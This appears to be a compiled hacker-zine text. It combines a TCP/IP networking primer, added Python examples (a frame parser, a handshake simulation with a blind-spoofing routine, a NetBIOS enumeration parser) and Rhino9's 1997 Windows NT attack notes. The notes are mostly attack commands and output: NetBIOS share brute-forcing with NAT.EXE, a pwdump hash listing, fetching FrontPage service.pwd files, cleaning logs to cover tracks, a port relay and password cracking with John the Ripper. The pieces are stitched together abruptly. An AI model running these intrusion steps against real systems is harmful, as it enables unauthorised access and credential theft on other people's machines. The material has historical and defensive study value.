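    if struct.unpack("!H", body[12:14])[0] != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    ip = body[14:]
    ihl = (ip[0] & 0x0F) * 4                                         # IP header length in bytes
    if checksum(ip[:ihl]) != 0:
        raise ValueError("bad IP header checksum")
    total_len, proto = struct.unpack("!H", ip[2:4])[0], ip[9]
    if proto != PROTO_UDP:
        raise ValueError("not UDP")
    udp = ip[ihl:total_len]
    sport, dport, udp_len, udp_ck = struct.unpack("!HHHH", udp[:8])
    pseudo = ip[12:20] + struct.pack("!BBH", 0, PROTO_UDP, udp_len)
    if udp_ck and checksum(pseudo + udp[:udp_len]) != 0:             # checksum 0 = not used
        raise ValueError("bad UDP checksum")
    opcode, block = struct.unpack("!HH", udp[8:12])
    return {
        "src_ip": ".".join(map(str, ip[12:16])), "dst_ip": ".".join(map(str, ip[16:20])),
        "sport": sport, "dport": dport, "opcode": opcode, "block": block,
        "data": udp[12:udp_len],
        "sizes": {"ethernet": 14, "ip": ihl, "udp": 8, "tftp": 4,
                  "data": udp_len - 12, "trailer": 4, "frame": len(frame)},
    }


if __name__ == "__main__":
    frame = build_frame(b"A" * 200)
    print(parse_frame(frame)["sizes"])
```

Feeding 200 bytes of payload in gives a 250-byte frame (14 + 20 + 8 + 4 + 200 + 4), and flipping any byte makes the parser refuse the frame at the first layer whose check covers that byte.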
                   ┌────────┬──────────┐
Application Layer: │ Header │   Data   │
                   └────────┴──────────┘
                   ┌────────┬────────┬──────────┐
Transport Layer:   │ Header │ Header │   Data   │
                   └────────┴────────┴──────────┘
                   ┌────────┬────────┬────────┬──────────┐
Network Layer:     │ Header │ Header │ Header │   Data   │
                   └────────┴────────┴────────┴──────────┘
                   ┌────────┬────────┬────────┬────────┬──────────┐
Link Layer:        │ Header │ Header │ Header │ Header │   Data   │
                   └────────┴────────┴────────┴────────┴──────────┘

Everything to the right of a layer's own header is, from that layer's point of view, just data. For example, a TFTP packet carrying 200 bytes of data using UDP/IP over Ethernet looks like this:

┌──────────┬──────────┬──────────┬──────────┬──────────────┬──────────┐
│ Ethernet │    IP    │   UDP    │   TFTP   │     Data     │ Ethernet │
│  Header  │  Header  │  Header  │  Header  │              │ Trailer  │
└──────────┴──────────┴──────────┴──────────┴──────────────┴──────────┘
 (bytes)  14         20         8          4          200          4

The Ethernet header is 14 bytes (two 6-byte MAC addresses and a 2-byte type); an IP header with no options is 20 bytes; the UDP header is 8 bytes; the TFTP data header is 4 bytes (a 2-byte opcode and a 2-byte block number); and the Ethernet trailer is the 4-byte frame check sequence. This adds up to a total Ethernet frame size of 250 bytes.

-──-────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The Internet Protocol (IP)
-──-────────────────────────────────────────────────────────────────────────

IP is the cornerstone of the TCP/IP suite. Every piece of data on the Internet travels in IP packets, the basic unit of IP transmission. IP is termed a connectionless, unreliable protocol: IP does not exchange control information before transmitting data to a remote system, the packets are merely sent towards the destination with the expectation that they will be treated properly. IP is unreliable because it does not retransmit lost packets and does not checksum the data it carries (the IP header checksum covers only the header itself). IP depends upon the upper level protocols such as TCP or UDP to do this.

IP defines a universal addressing scheme called IP addresses. An IP address is a 32-bit number, and each standard address is unique on the Internet. Given an IP packet, the information can be routed to the destination based upon the IP address in the packet header. IP addresses are generally written as four numbers between 0 and 255, separated by periods (i.e.
168.143.27.120). While a 32-bit number is a convenient way for computers to address systems, humans understandably have difficulty remembering them. Thus the Domain Name System (DNS) was developed to map domain names to their corresponding IP addresses, and vice versa: mulder.clark.net resolves to 168.143.27.120, and 168.143.27.120 resolves back to mulder.clark.net. It is very important to realize that these domain names are not used or understood by IP at all. When an application wants to transmit data to another machine, it must first translate the domain name to an IP address using DNS, and only the address goes into the packet. The receiving application sees only the source IP address; if it wants a name to log or display, it must ask DNS for a reverse lookup of that address. Such a reverse lookup is answered by whoever controls the reverse zone for that address, so a name obtained this way should not be trusted for access decisions unless it also resolves forward to the same address. There is not a one to one correspondence between IP addresses and domain names: a domain name can map to multiple IP addresses, and multiple domain names can map to the same IP address.

-──-────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The Transmission Control Protocol (TCP)
-──-────────────────────────────────────────────────────────────────────────

Most Internet applications and services use the Transmission Control Protocol (TCP) to implement the transport layer. TCP provides a reliable, connection-oriented, continuous-stream protocol. The implications of these characteristics are:

o Reliable: When TCP segments, the smallest unit of a TCP transmission, are lost or corrupted, the TCP implementation will detect this and retransmit the necessary segments.
o Connection-oriented: TCP sets up a connection with a remote system by exchanging control information, known as a handshake, before beginning a communication. At the end of the connection, a similar closing handshake is performed to end the transmission.
o Continuous-stream: TCP provides a communications medium that allows an arbitrary number of bytes to be sent and received smoothly; once a connection has been established, TCP segments give the application layer the appearance of a continuous flow of data.

It is because of these characteristics that it is easy to see why TCP is used by most Internet applications and services. TCP makes it very easy to create a network application, freeing you from worrying about how the data is broken up or about coding error-recovery routines. However, TCP requires a significant amount of overhead, and retransmission of lost data may not even be wanted, because the information could have expired by the time it arrives; this makes UDP the popular choice for simpler applications and services. Below is a chart comparing TCP to both UDP and IP, showing strengths and weaknesses.

                      ┌─────┬─────┬─────┐
                      │ IP  │ UDP │ TCP │
┌─────────────────────┼─────┼─────┼─────┤
│ connection-oriented │ no  │ no  │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ message boundaries  │ yes │ yes │ no  │
├─────────────────────┼─────┼─────┼─────┤
│ data checksum       │ no  │ opt │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ positive ack.       │ no  │ no  │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ timeout and rexmit  │ no  │ no  │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ duplicate detection │ no  │ no  │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ sequencing          │ no  │ no  │ yes │
├─────────────────────┼─────┼─────┼─────┤
│ flow control        │ no  │ no  │ yes │
└─────────────────────┴─────┴─────┴─────┘

An important addressing scheme which TCP defines is the port. Ports are used to separate the various TCP streams running concurrently on the same system. Server applications, which wait for TCP clients to initiate contact, listen on a specific, well-known port so that clients know where to connect. These concepts all come together in a programming abstraction known as sockets.
TCP socket basics will be covered later on. The diagram below shows how TCP makes a connection, using what is called a three-way handshake. The server is always running and waits for clients to start the connection. The client sends a segment with the SYN (synchronize) flag set, carrying a randomly generated initial sequence number x. The server replies with a segment that both acknowledges the client's SYN, with an acknowledgment number of x+1, and carries the server's own SYN with its own randomly generated initial sequence number y. The client then responds with an ACK whose acknowledgment number is y+1. The connection is now established. The "randomly generated" part matters: if an attacker can predict y, it can complete a handshake from a forged source address without ever seeing the server's SYN/ACK, which is the basis of the classic TCP sequence number spoofing attacks.

Client                                                Server

Generate x       -------- SYN(x) --------->           Receive SYN(x)
                                                      Generate y
Receive SYN(y)   <--- ACK(x+1)/SYN(y) -----           Send ACK(x+1) and SYN(y)
and ACK(x+1)
Send ACK(y+1)    -------- ACK(y+1) -------->          Receive ACK(y+1)

                     Connection Established

-──-────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The User Datagram Protocol (UDP)
-──-────────────────────────────────────────────────────────────────────────

UDP is a low overhead alternative to TCP for host to host communications. In contrast to TCP, UDP has the following characteristics:

o Unreliable: UDP has no mechanisms for retransmitting lost or corrupted information; its checksum only lets the receiver throw corrupted datagrams away.
o Connectionless: UDP does not negotiate a connection before transmitting data. Information is sent with the assumption that the recipient will be listening.
o Message-oriented: UDP allows applications to send self-contained messages within UDP datagrams, the unit of UDP transmission. The application must package all information within individual datagrams.

For some applications, UDP is a more fitting protocol than TCP. For time protocols, lost data indicating the current time would be invalid and outdated by the time that it was retransmitted. Another example is NFS: the Network File System can operate more efficiently and provide its own reliability at the application layer, and thus uses UDP.
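The handshake above, simulated in code, as an added example that is not part of the article: a client and a server object exchange SYN, SYN/ACK and ACK segments and track their states, and a second routine shows the blind spoofing case just mentioned, where the attacker never sees the SYN/ACK and has to guess the server's initial sequence number. Segments are plain Python objects rather than real packets; the 1000 used as a "predictable" ISN is an arbitrary sample value.

```python
"""Simulate the TCP three-way handshake from the diagram above, including
what goes wrong when the server's initial sequence number is guessable.
Added example, not part of the article; segments are Python objects, not
real packets."""
import secrets
from dataclasses import dataclass

SYN, RST, ACK = 0x02, 0x04, 0x10          # TCP flag bits
MASK = 0xFFFFFFFF                         # sequence numbers are 32-bit


@dataclass
class Segment:
    flags: int
    seq: int
    ack: int = 0


def random_isn() -> int:
    """Unpredictable 32-bit initial sequence number (what a stack should use)."""
    return secrets.randbelow(1 << 32)


class Server:
    def __init__(self, isn_source=random_isn):
        self.isn_source = isn_source
        self.state, self.isn, self.client_isn = "LISTEN", None, None

    def receive(self, seg: Segment):
        if self.state == "LISTEN" and seg.flags == SYN:
            self.client_isn, self.isn = seg.seq, self.isn_source()
            self.state = "SYN-RECEIVED"
            return Segment(SYN | ACK, seq=self.isn, ack=(seg.seq + 1) & MASK)
        if (self.state == "SYN-RECEIVED" and seg.flags == ACK
                and seg.seq == (self.client_isn + 1) & MASK):
            if seg.ack == (self.isn + 1) & MASK:
                self.state = "ESTABLISHED"
                return None
            self.state = "LISTEN"        # wrong ACK number: the peer never saw our SYN
            return Segment(RST, seq=seg.ack)
        return Segment(RST, seq=seg.ack)


class Client:
    def __init__(self, isn_source=random_isn):
        self.isn_source = isn_source
        self.state, self.isn = "CLOSED", None

    def connect(self) -> Segment:
        self.isn, self.state = self.isn_source(), "SYN-SENT"
        return Segment(SYN, seq=self.isn)

    def receive(self, seg: Segment):
        if (self.state == "SYN-SENT" and seg.flags == SYN | ACK
                and seg.ack == (self.isn + 1) & MASK):
            self.state = "ESTABLISHED"
            return Segment(ACK, seq=(self.isn + 1) & MASK, ack=(seg.seq + 1) & MASK)
        self.state = "CLOSED"
        return Segment(RST, seq=seg.ack)


def handshake(client: Client, server: Server) -> str:
    """Normal exchange: SYN(x), SYN(y)/ACK(x+1), ACK(y+1)."""
    syn = client.connect()
    syn_ack = server.receive(syn)
    ack = client.receive(syn_ack)
    server.receive(ack)
    return server.state


def blind_spoof(server: Server, guessed_isn: int, spoofed_isn: int = 1) -> str:
    """An attacker sending from a forged address never sees SYN(y)/ACK(x+1),
    so it must guess y to produce ACK(y+1). With predictable ISNs it succeeds."""
    server.receive(Segment(SYN, seq=spoofed_isn))   # the SYN/ACK goes to the victim, not to us
    server.receive(Segment(ACK, seq=(spoofed_isn + 1) & MASK, ack=(guessed_isn + 1) & MASK))
    return server.state


if __name__ == "__main__":
    print("honest handshake:", handshake(Client(), Server()))
    print("blind spoof vs random ISN:", blind_spoof(Server(), guessed_isn=1000))
    print("blind spoof vs fixed ISN:", blind_spoof(Server(isn_source=lambda: 1000), guessed_isn=1000))
```

Against a server whose ISN is a fixed 1000 the blind spoof lands in ESTABLISHED; against one using random ISNs the guess fails and the server answers with a RST and goes back to LISTEN.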
As with TCP, UDP provides the addressing scheme of ports, allowing many applications to simultaneously send and receive datagrams. UDP ports are distinct from TCP ports. For example, one application can answer on UDP port 512 while an unrelated service handles TCP port 512 (biff and exec, respectively, in /etc/services). To see which ports use which protocol and service, look at a copy of /etc/services, available on any UNIX box.

[Windows NT Vulnerability Theories Version 2...........................vacuum]

==========Windows NT Vulnerability Theories Version 2=============

by Vacuum & Chame|eon of Rhino9 [www.rhino9.org is coming]
[http://www.technotronic.com -- vacuum@technotronic.com]
December 04, 1997

Look for a NT Security Suite to be released by Rute soon based on the theories mentioned in this text.

Special thanks to NeonSurge creator of rhino9, l0pht for l0phtcrack 1.5, Jeremy Allison for pwdump, Andrew Tridgell for NAT and SAMBA, CyberToast, Darkling, Rute, pSId for coding a linux version, and Microsoft for creating tools that have nice holes in them. All mentioned programs available at www.technotronic.com

This r9-nt-v2.zip includes:

vacuum.txt             This text file.
vac1.cap               Network Monitor packet sniffing sessions in native format. This capture is a FrontPage hack session.
sniff.txt              ASCII version, which does not require Network Monitor to be read, highlighting the vac1.cap session.
service.pwd-scanner.c  Scans for the FrontPage extension service.pwd file; for use on Linux based machines.
dnscan                 Lists all servers in a particular domain and can be used as an input file for service.pwd-scanner.
datapipe.c             datapipe is similar to bounce.c:
                         gcc -o datapipe datapipe.c
                         chmod 755 datapipe
                         ./datapipe 2222 23 www.target.com
                       where 2222 is the local port datapipe listens on and 23 is the destination port on www.target.com; for the FrontPage attack the destination port would be 80.

If any programmers want to go HARDCORE with me, I have set up the appropriate symbol files as well as the capability of running a "remote" debug through the modem to share my ideas/theories.

==========NetBIOS Attack Program==================================

Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1

NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS
  -o  Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
  -u  Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.
  -p  Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.
Addresses should be specified in comma delimited format, with no spaces. Valid address specifications include:

  hostname                - "hostname" is added
  127.0.0.1-127.0.0.3     - adds addresses 127.0.0.1 through 127.0.0.3
  127.0.0.1-3             - adds addresses 127.0.0.1 through 127.0.0.3
  127.0.0.1-3,7,10-20     - adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, and 127.0.0.10 through 127.0.0.20
  hostname,127.0.0.1-3    - adds "hostname" and 127.0.0.1 through 127.0.0.3

All combinations of hostnames and address ranges as specified above are valid. Note that NAT.EXE will IP scan for NetBIOS shares as shown above.

Comparing NAT.EXE to Microsoft's own executables:

C:\>nbtstat -A 204.73.131.11

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1        <20>  UNIQUE      Registered
STUDENT1        <00>  UNIQUE      Registered
DOMAIN1         <00>  GROUP       Registered
DOMAIN1         <1C>  GROUP       Registered
DOMAIN1         <1B>  UNIQUE      Registered
STUDENT1        <03>  UNIQUE      Registered
DOMAIN1         <1E>  GROUP       Registered
DOMAIN1         <1D>  UNIQUE      Registered
..__MSBROWSE__. <01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name):

Computername <00> UNIQUE  Workstation Service name
Domainname   <00> GROUP   Domain name
Computername <20> UNIQUE  Server Service name
Computername <03> UNIQUE  Registered by the Messenger Service. This is the computer name to be added to the LMHOSTS file, which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
Username     <03> UNIQUE  Registered by the Messenger Service (the logged-on user's name).
Domainname   <1B> UNIQUE  Registers the local computer as the domain master browser for the domain
Domainname   <1C> GROUP   Registers the computer as a domain controller for the domain (PDC or BDC)
Domainname   <1D> UNIQUE  Registers the local computer as the master browser for the local segment
Domainname   <1E> GROUP   Registers as a group NetBIOS name (used for browser elections)
                  <06>    RAS Server
                  <1F>    Net DDE
                  <21>    RAS Client
                          Network Monitor Agent, Network Monitor Name

C:\>net view 204.73.131.11
Shared resources at 204.73.131.11

Share name   Type   Used as   Comment
------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]

C:\>net use x: \\204.73.131.11\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           X:        \\204.73.131.11\test      Microsoft Windows Network
OK                     \\204.73.131.11\test      Microsoft Windows Network
The command completed successfully.
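The nbtstat output above is a decoded NetBIOS Name Service node status response (RFC 1002, NBSTAT record). As an added example, not code from the article or from NAT.EXE, here is a parser for the RDATA of that response that prints the same name table and then draws the conclusions an attacker draws from the suffix list: host name, domain, whether the box serves files, whether it is a domain controller. The response bytes are constructed inline to mirror the STUDENT1/DOMAIN1 table; the NAME_FLAGS bit layout (group bit 0x8000, ACT 0x0400, CNF 0x0800, DRG 0x1000) and the MAC address in the first six bytes of the STATISTICS block are from RFC 1002 and Microsoft's implementation.

```python
"""Decode a NetBIOS Name Service node status response (what nbtstat -A asks
for, RFC 1002 section 4.2.18) and draw the same conclusions a NAT.EXE user
draws from the suffix table above. Added example, not from the article."""
import struct

# Suffix table from the article: (16th byte, group flag) -> meaning
SUFFIXES = {
    (0x00, False): "Workstation Service",
    (0x00, True):  "Domain name",
    (0x01, True):  "__MSBROWSE__ (master browser announcement)",
    (0x03, False): "Messenger Service (computer or user name)",
    (0x06, False): "RAS Server",
    (0x1B, False): "Domain Master Browser",
    (0x1C, True):  "Domain Controller (PDC or BDC)",
    (0x1D, False): "Master Browser for this segment",
    (0x1E, True):  "Browser election group",
    (0x1F, False): "Net DDE",
    (0x20, False): "Server Service (file shares)",
    (0x21, False): "RAS Client",
}


def _printable(raw: bytes) -> str:
    # nbtstat shows non-printable bytes (as in __MSBROWSE__) as dots
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw).rstrip()


def parse_node_status(rdata: bytes) -> dict:
    """rdata is the RDATA of the NBSTAT resource record: NUM_NAMES, then
    18-byte NODE_NAME entries (16-byte name + 2-byte NAME_FLAGS), then the
    STATISTICS block whose first 6 bytes (UNIT_ID) carry the MAC address."""
    num_names = rdata[0]
    names, off = [], 1
    for _ in range(num_names):
        raw = rdata[off:off + 16]
        flags = struct.unpack("!H", rdata[off + 16:off + 18])[0]
        off += 18
        group = bool(flags & 0x8000)            # G bit: group vs unique name
        if flags & 0x1000:                      # DRG: name is being deregistered
            status = "Deregistered"
        elif flags & 0x0800:                    # CNF: name is in conflict
            status = "Conflict"
        elif flags & 0x0400:                    # ACT: name is active
            status = "Registered"
        else:
            status = "Unknown"
        names.append({"name": _printable(raw[:15]), "suffix": raw[15],
                      "type": "GROUP" if group else "UNIQUE", "status": status,
                      "role": SUFFIXES.get((raw[15], group), "unknown")})
    mac = "-".join("%02X" % b for b in rdata[off:off + 6])
    return {"names": names, "mac": mac}


def summarize(status: dict) -> dict:
    """What the name table tells an attacker (or an auditor) about the host."""
    names = status["names"]

    def find(suffix, group):
        return [n["name"] for n in names
                if n["suffix"] == suffix and (n["type"] == "GROUP") == group]

    hosts, domains = find(0x00, False), find(0x00, True)
    return {
        "hostname": hosts[0] if hosts else None,
        "domain": domains[0] if domains else None,
        "file_server": bool(find(0x20, False)),
        "domain_controller": bool(find(0x1C, True)),
        "master_browser": bool(find(0x1D, False) or find(0x1B, False)),
        "logged_on_users": [n for n in find(0x03, False) if n not in hosts],
        "mac": status["mac"],
    }


# Constructed sample response mirroring the nbtstat -A output in the article
def _entry(name: str, suffix: int, group: bool) -> bytes:
    flags = (0x8000 if group else 0) | 0x0400       # G bit plus ACT (registered)
    return name.encode("latin-1").ljust(15, b" ") + bytes([suffix]) + struct.pack("!H", flags)


SAMPLE_RDATA = bytes([9]) + b"".join(_entry(n, s, g) for n, s, g in [
    ("STUDENT1", 0x20, False), ("STUDENT1", 0x00, False), ("DOMAIN1", 0x00, True),
    ("DOMAIN1", 0x1C, True), ("DOMAIN1", 0x1B, False), ("STUDENT1", 0x03, False),
    ("DOMAIN1", 0x1E, True), ("DOMAIN1", 0x1D, False),
    ("\x01\x02__MSBROWSE__\x02", 0x01, True),
]) + bytes.fromhex("00c04fc48c9d") + bytes(40)       # UNIT_ID (MAC) + rest of STATISTICS


if __name__ == "__main__":
    st = parse_node_status(SAMPLE_RDATA)
    for n in st["names"]:
        print("%-16s <%02X> %-6s %-12s %s" % (n["name"], n["suffix"], n["type"],
                                             n["status"], n["role"]))
    print("MAC Address =", st["mac"])
    print(summarize(st))
```

A <1C> group name for DOMAIN1 on a host is the tell that the box is a domain controller, which is why the NAT run that follows is interesting on that particular address; a <03> entry whose name differs from the <00> host name gives away a logged-on user name for free.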
C:\>nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk:     Remote Admin
        C$             Disk:     Default share
        IPC$           IPC:      Remote IPC
        NETLOGON       Disk:     Logon server share
        Test           Disk:

[*]--- This machine has a browse list:

        Server               Comment
        ---------            -------
        STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

Note the "wants us to encrypt, telling it not to" line: the server offered challenge/response password encryption and NAT simply declined it, so the guessed password travels in the clear and the server accepts it anyway. If the default shares are left at Everyone/Full Control, that is all it takes. Done, it is hacked.

==========Frontpage Extension Scanner & Cracker========================

C:\>pwdump 204.73.131.11

NOTE: This is the pwdump output from the web server; the Administrator password is set to "password" (the LM hash E52CAC67419A9A224A3B108F3FA6CB6D and NT hash 8846F7EAEE8FB117AD06BDD830B7586C below are the well-known hashes of exactly that string).

Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::

The #haccess.ctl file:

# -FrontPage-
Options None
order deny,allow
deny from all
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

Executing fpservwin.exe allows FrontPage server extensions to be
installed on port 443 (HTTPS, Secure Sockets Layer) or port 80 (HTTP).

NOTE: The Limit line. Telnetting to port 80 or 443 and using GET, POST and PUT can be used instead of FrontPage.

The following is a list of the Internet Information Server file locations in relation to the local hard drive (C:) and the web (www.target.com):

C:\InetPub\wwwroot
C:\InetPub\scripts                                 /Scripts
C:\InetPub\wwwroot\_vti_bin                        /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm               /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut               /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                                 /cgi-bin
C:\InetPub\wwwroot\srchadm                         /srchadm
C:\WINNT\System32\inetserv\iisadmin                /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM     Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm

NOTE: QUERYHIT.HTM is only present if Index Server is running under Internet Information Server.

service.pwd is our goal, although lots of servers are not password protected and can be exploited easily. queryhit.htm, if found, can be used to get service.pwd: search for "#filename=*.pwd".

FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:

service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).

On Netscape servers, there are no service.grp files. The Netscape password files are:

administrators.pwd  for administrators
authors.pwd         for authors and administrators
users.pwd           for users, authors, and administrators

NOTE: Name and password are case sensitive.

Scanning PORT 80 or 443 options:

GET /_vti_inf.html                 # Ensures that FrontPage server extensions are installed.
GET /_vti_pvt/service.pwd          # Contains the encrypted passwords. Not used on IIS and WebSite servers.
GET /_vti_pvt/authors.pwd          # On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log           # If author.log is there it will need to be cleaned to cover your tracks.
GET /samples/search/queryhit.htm

If service.pwd is obtained it will look similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple. The hash is a traditional UNIX crypt(3) DES hash, so turn the line into passwd format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

and save it as service.txt. Then run your favorite UNIX password cracker, like John the Ripper:

C:\>john -w:dictionary.txt service.txt

Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags:
 -pwfile:[,..]            specify passwd file(s) (wildcards allowed)
 -wordfile:               specify wordlist file
 -restore[:]              restore session [from ]
 -user:login|uid[,..]     only crack this (these) user(s)
 -timeout: